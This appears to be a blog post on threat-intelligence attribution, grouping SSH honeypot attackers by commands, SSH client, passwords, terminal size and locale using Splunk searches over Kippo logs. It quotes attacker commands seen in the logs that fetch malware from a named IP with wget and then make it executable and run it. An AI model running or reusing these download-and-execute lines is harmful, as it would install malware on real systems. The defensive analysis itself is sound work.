One thing I've wanted to do with Tango was find a way to provide some sort of "attribution", or identify similarities in attackers as a way to group them together. I'm doing this "attribution" using a thing I'm calling "Soft TTP's" or Tools, Tactics and Procedures, which can help identify actor's based on how they act and what tools they are using.

Some TTP's we have access to in our honeypot logs are (in no particular order):

Commands Entered

SSH Client Version

Username/Password's Used

Terminal Window Size

Environment Details

As you can see, none of these things are really definitive proof that they are the same attacker, which is why they are "soft". Even if all the above TTP's were similar, that's still not a guarantee, I'll give some examples:

There are no unique commands per attacker, however some commands can contain similarities, such as using the same domain for malware. Another scenario would be the attacker using the same commands for reconnaissance, such as, uname -a , ps -aef , w , the thing is with this is, most attackers perform the same type of recon. However, the more commands that are similar, the more likely it is to be the same attacker. I'm not talking 70%-80%, it would be more like 99%-100%, since again, commands aren't unique per attacker, but, if there are 15 commands being entered on a honeypot, and they are all the same, with the same timing, and all use the same arguments ( ps -a vs. ps -aux ), then it might be the same attacker.

, , , the thing is with this is, most attackers perform the same type of recon. However, the more commands that are similar, the more likely it is to be the same attacker. I'm not talking 70%-80%, it would be more like 99%-100%, since again, commands aren't unique per attacker, but, if there are 15 commands being entered on a honeypot, and they are all the same, with the same timing, and all use the same arguments ( vs. ), then it might be the same attacker. Next, SSH Client Version, again, not that valuable by itself, but, paired with all the other factors, then it's "possible" to be the same attacker. Here, we would just be looking at if they are using PuTTY or OpenSSH or libssh, and what version of the client.

Usernames and Passwords used can be pretty valuable, especially if there are really unique passwords being used. Again, this is pretty pointless used by itself, since everyone out there can grab rockyou.txt and start scanning, however, if there are really unique passwords being used, or a particular username, then it might be worth something to look into.

The Terminal Window Size is another factor to add into your "attribution". We would see something like "Terminal Size: 80x34", which isn't always present, but, sometimes we get it.

Lastly, something that we don't normally see in our logs, but we have seen is Keyboard/Character Encoding/Language or environment variables. So, sometimes we'll see UTF-8 or \x00\x00\x00\x04LANG\x00\x00\x00\x0bja_JP.UTF-8 (which is for Japanese users), or any other language settings. This would probably hold the most weight in my opinion when used in conjunction with other TTP's, but again, no surefire way to identify them as the same attacker.

Now that we have identified some of the ways to possibly identify attackers based on their TTP's, let's see how we can do this in Splunk with our honeypot logs.

Grouping Attackers Based on Commands Entered

First up is looking at the commands entered by attackers to notice similarities. Again, we'd need these to be a near perfect match to have any value in possible attribution, also to note, this would probably only identify bots controlled by the same individual(s), not individual attackers, since it's highly unlikely an individual would log into several different honeypots, and run the exact same commands with no typos. It's possible that's the case, but, not likely.

sourcetype=kippojson [ search sourcetype=kippojson command=* | stats count by session | fields session ] | transaction session | nomv command | stats values(src_ip) dc(src_ip) as dc by command | sort - dc

The above will look through the honeypot logs and group the events by their Session ID. It then takes all the different commands seen in the entire event and creates one field out of them, resulting in something like, ps -ef uname w . We then get the values of the src_ip (attacker) field and the distinct count of attacker IP addresses.

Looking at the results above, we can see there were a lot of users doing the single command wget http://23.234.60.140/install/8000 , which is the SSHPsychos/Group 93/Hee Thai campaign that is pretty big right now. Again, it's only one command being entered, so, that's not as useful as the third event down, which is:

./8003 chmod +x 8003 ls -la /var/run/sftp.pid wget http://23.234.60.140/install/8003

While the above doesn't have a ton of commands being entered, it's a better example of what could be considered a "soft" TTP, since it shows them downloading the malware, making it executable and then running it. Again, it's not great, but, it's a start.

SSH Clients

Adding on to the previous search, we can further see if these are all the same attackers, by looking at what SSH client they used to connect to our honeypots:

sourcetype=kippojson [ search sourcetype=kippojson command=* | stats count by session | fields session ] | transaction session | nomv command | stats values(src_ip) dc(src_ip) as dc values(client) by command | sort - dc

We added in the values(client) to the original search, which will give us all the different SSH clients seen:

Looking at the screenshot, the commands of interest were seen with only one SSH client, SSH-2.0-PUTTY . Again, this doesn't prove they are definitely the same attacker, however, it helps that there is only one version, instead of the top event in the screenshot, which shows multiple clients.

Username/Password Analysis

I don't have a great example of this, since most of the honeypots I have access to accept any password, which doesn't provide us with good data for analysis. The honeypots I personally manage, however, accept only one password, which is the data I will be using for this example:

sourcetype=kippojson [ search sourcetype=kippojson src_ip=104.167.16.5 OR src_ip=175.126.82.235 host=hp-belair-md-01 | stats count by session | fields session ] | transaction session | stats values(password) by src_ip

In the search above, I'm limiting the attacker IP's to only two that had the same commands, I'm also limiting it to just my honeypot as well. At the end of the command I want Splunk to return the values of password by each attacker IP. Unfortunately and fortunately for me, I'm using the weakest password known to man, 123456, which gets me a lot of attackers logging in, but, doesn't let everyone in, all the time. Because of this password, it was probably one of the top password the attackers used, which is evidenced by this screenshot:

What we don't see though, is the other password was empty. So, the attackers tried an empty password, then 123456 and got in. While this isn't proof that these are the same attackers, it just shows they are using the same list possibly. But, if we pair this with the attackers using the same commands and same SSH client, we're closer to possible identification that it's the same user.

Terminal Window Size

This is just another source of data we have available that could just add a little more probability that it's the same attacker. We don't see this data often however, which doesn't help us that much. Below is an example of when we do:

The above screenshot shows the values of the terminal_size field by attacker IP. I'm not sure of the significance of the 24x80 switch to 80x24, that's something I'll look into more. However, having access to this could help us out a little bit, since if the attackers are using the same window size, along with the same SSH client version, and same commands, and same passwords, then it's possible it's the same attacker.

Environment Details

The last section I'll touch on is the environment details, such as language encoding. This hasn't been implemented in the fork of Kippo I'm using, but in the original Kippo, we saw this quite a bit:

In the screenshot we can see a few different language encodings, such as English, German, and Chinese. Like I said, we don't have access to this in the new fork of Kippo, so it's not of much use to us, however, I will submit an issue to the Github page and see if we can get this added, since I feel it can provide that extra probability to group the attackers together.

Closing

So, what does all this tell us? Well, if you're into attribution, or doing threat research, it can help you identify a particular attacker's infrastructure. By being able to identify a groups TTP's, you can look for these patterns and trends in your logs and with some certainty, attribute certain attacks to the same attacker. This will allow you to prioritize attacks from these certain actors, depending on how "bad" these guys are.

Again, I'm not claiming that this is a foolproof way to do attribution, nor am I saying that these attackers are the same. I'm just providing some insight and a few ways to possibly identify the same attackers.

One last thing, I started using a new visualization in Splunk, which is the dendrogram. This is useful for providing some visual diagrams which can possibly highlight items of interest. For example, I did a search for SSH Clients and IP's that run the same group of commands, which looks like this...

Looking at the screenshot, we can see a few commands being entered, which all use the same SSH client, and then the multiple IP's that are running those commands. Here's the applicable code that produced the above, given you have the app installed.